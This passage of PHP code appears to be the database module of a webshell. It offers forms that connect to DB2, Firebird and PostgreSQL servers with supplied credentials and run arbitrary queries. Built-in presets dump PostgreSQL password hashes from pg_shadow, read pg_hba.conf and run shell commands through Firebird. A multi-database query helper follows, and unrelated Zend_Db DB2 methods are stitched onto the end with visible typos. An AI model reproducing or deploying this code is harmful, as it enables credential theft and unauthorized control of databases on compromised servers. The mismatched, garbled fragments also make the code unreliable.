//$db2string = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=$db2dbname;"."HOSTNAME=$db2host;PORT=$db2port;PROTOCOL=TCPIP;UID=$db2user;PWD=$db2pass;";
$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
$db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
$db2row = db2_fetch_row($db2result);
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td bgcolor="#228B22"><b>' . db2_field_name($db2result);
echo "</b></td>\n";
}
echo "</tr>\n";
while ($db2row = db2_fetch_row($db2result)) {
echo "<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$db2row[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
db2_free_result($db2result);
db2_close();
}
} elseif ($db == "fb") {
$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
$fbpath = str_replace("\\\\", "\\", $fbpath);
$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******';
$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******';
$fbaction = isset($_POST['action']) ? $_POST['action'] : '';
$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
$fbquery = stripslashes($fbquery);
print <<<END
<form method="POST" name="fbform" action="?s=w&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
\tStr = new Array(5);
Str[0] = "";
\tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
Str[3] = "input 'D:\\createtable.sql';";
Str[4] = "shell netstat -an;";
\tfbform.fbsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">tables</option>
<option value="2">columns</option>
<option value="3">import sql</option>
<option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($fbaction == 'fbquery') {
$fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
$fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td bgcolor="#228B22"><b>' . ibase_field_info($fbresult, $i);
echo "</b></td>\n";
}
echo "</tr>\n";
ibase_field_info($fbresult, 0);
while ($fbrow = ibase_fetch_row($fbresult)) {
echo "<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$fbrow[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
ibase_free_result($fbresult);
ibase_close();
}
} else {
$pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost';
$pguser = isset($_POST['pguser']) ? $_POST['pguser'] : '******';
$pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : '';
$pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres';
$pgaction = isset($_POST['action']) ? $_POST['action'] : '';
$pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : '';
$pgquery = stripslashes($pgquery);
print <<<END
<form method="POST" name="pgform" action="?s=w">
<div class="actall">Host:<input type="text" name="pghost" value="{$pghost}" style="width:100px;">
User:<input type="text" name="pguser" vaule="{$pguser}" style="width:100px">
Pass:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px">
Dbname:<input type="text" name="pgdbname" value="{$pgdbname}" style="width:100px"><br><br>
<script language="javascript">
function pgFull(i){
\tStr = new Array(7);
\tStr[0] = "";
Str[1] = "select version();";
Str[2] = "select datname from pg_database;";
Str[3] = "select relname from pg_stat_user_tables limit 1 offset n;";
Str[4] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;";
Str[5] = "select usename,passwd from pg_shadow;";
\tStr[6] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
\tpgform.pgsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br>
<select onchange="return pgFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">version</option>
<option value="2">databases</option>
<option value="3">tables</option>
<option value="4">columns</option>
<option value="5">hashes</option>
\t<option value="6">pg_hb.conf</option>
</select>
<input type="hidden" name="action" value="pgquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($pgaction == 'pgquery') {
$pgconn = pg_connect("host={$pghost} dbname={$pgdbname} user={$pguser} password={$pgpass} ") or die('Could not connect: ' . pg_last_error());
$pgresult = pg_query($pgquery) or die('Query failed: ' . pg_last_error());
$pgrow = pg_fetch_row($pgresult);
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < pg_num_fields($pgresult); $i++) {
echo '<td bgcolor="#228B22"><b>' . pg_field_name($pgresult, $i);
echo "</b></td>\n";
}
echo "</tr>\n";
pg_result_seek($pgresult, 0);
while ($pgrow = pg_fetch_row($pgresult)) {
echo "<tr>\n";
for ($i = 0; $i < pg_num_fields($pgresult); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$pgrow[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
pg_free_result($pgresult);
pg_close();
}
}
}
function sqlqu($sqlty, $host, $user, $pass, $db = '', $query)
{
$res = '';
switch ($sqlty) {
case 'MySQL':
if (!function_exists('mysql_connect')) {
return 0;
}
$link = @mysql_connect($host, $user, $pass);
if ($link) {
if (!empty($db)) {
@mysql_select_db($db, $link);
}
$result = @mysql_query($query, $link);
if ($result != 1) {
while ($data = @mysql_fetch_row($result)) {
$res .= implode('+', $data) . '-+';
}
$res .= '*';
for ($i = 0; $i < @mysql_num_fields($result); $i++) {
$res .= @mysql_field_name($result, $i) . '-';
}
}
@mysql_close($link);
return $res;
}
break;
case 'MSSQL':
if (!function_exists('mssql_connect')) {
return 0;
}
$link = @mssql_connect($host, $user, $pass);
if ($link) {
if (!empty($db)) {
@mssql_select_db($db, $link);
}
$result = @mssql_query($query, $link);
while ($data = @mssql_fetch_row($result)) {
$res .= implode('+', $data) . '-+';
}
$res .= '*';
for ($i = 0; $i < @mssql_num_fields($result); $i++) {
$res .= @mssql_field_name($result, $i) . '-';
}
@mssql_close($link);
return $res;
}
break;
case 'Oracle':
if (!function_exists('ocilogon')) {
return 0;
}
$link = @ocilogon($user, $pass, $db);
if ($link) {
$stm = @ociparse($link, $query);
@ociexecute($stm, OCI_DEFAULT);
while ($data = @ocifetchinto($stm, $data, OCI_ASSOC + OCI_RETURN_NULLS)) {
$res .= implode('+', $data) . '-+';
}
$res .= '*';
for ($i = 0; $i < oci_num_fields($stm); $i++) {
$res .= @oci_field_name($stm, $i) . '-';
}
return $res;
}
break;
case 'PostgreSQL':
if (!function_exists('pg_connect')) {
return 0;
}
$link = @pg_connect("host={$host} dbname={$db} user={$user} password={$pass}");
if ($link) {
$result = @pg_query($link, $query);
while ($data = @pg_fetch_row($result)) {
$res .= implode('+', $data) . '-+';
}
$res .= '*';
for ($i = 0; $i < @pg_num_fields($result); $i++) {
$res .= @pg_field_name($result, $i) . '-';
}
@pg_close($link);
return $res;
}
break;
case 'DB2':
if (!function_exists('db2_connect')) {
return 0;
}
$link = @db2_connect($db, $user, $pass);
if ($link) {
$result = @db2_exec($link, $query);
while ($data = @db2_fetch_row($result)) {
$res .= implode('+', $data) . '-+';
}
$res .= '*';
for ($i = 0; $i < @db2_num_fields($result); $i++) {
$res .= @db2_field_name($result, $i) . '-';
}
@db2_close($link);
return $res;
}
break;
}
return 0;
}
/**
* Executes a prepared statement.
*
* @param array $params OPTIONAL Values to bind to parameter placeholders.
* @return bool
* @throws Zend_Db_Statement_Db2_Exception
*/
public function execute(array $params = array())
{
if (!$this->_stmt) {
return false;
}
if (!$this->_stmt) {
require_once 'Zend/Db/Statement/Db2/Exception.php';
throw new Zend_Db_Statement_Db2_Exception(db2_conn_errormsg($connection), db2_conn_error($connection));
}
$retval = @db2_execute($this->_stmt, $params);
if ($retval === false) {
require_once 'Zend/Db/Statement/Db2/Exception.php';
throw new Zend_Db_Statement_Db2_Exception(db2_stmt_errormsg($this->_stmt), db2_stmt_error($this->_stmt));
}
$this->_keys = array();
if ($field_num = $this->columnCount()) {
for ($i = 0; $i < $field_num; $i++) {
$name = db2_field_name($this->_stmt, $i);
$this->_keys[] = $name;
}
}
$this->_values = array();
if ($this->_keys) {
$this->_values = array_fill(0, count($this->_keys), null);
}
return $retval;
}
/**
* Get the name of the specified field in a result
* @param Mixed qHanle The query handle
* @param Number offset
* @return String
*/
public function field_name($qHanle, $offset)
{
return db2_field_name($qHanle, $offset);
}
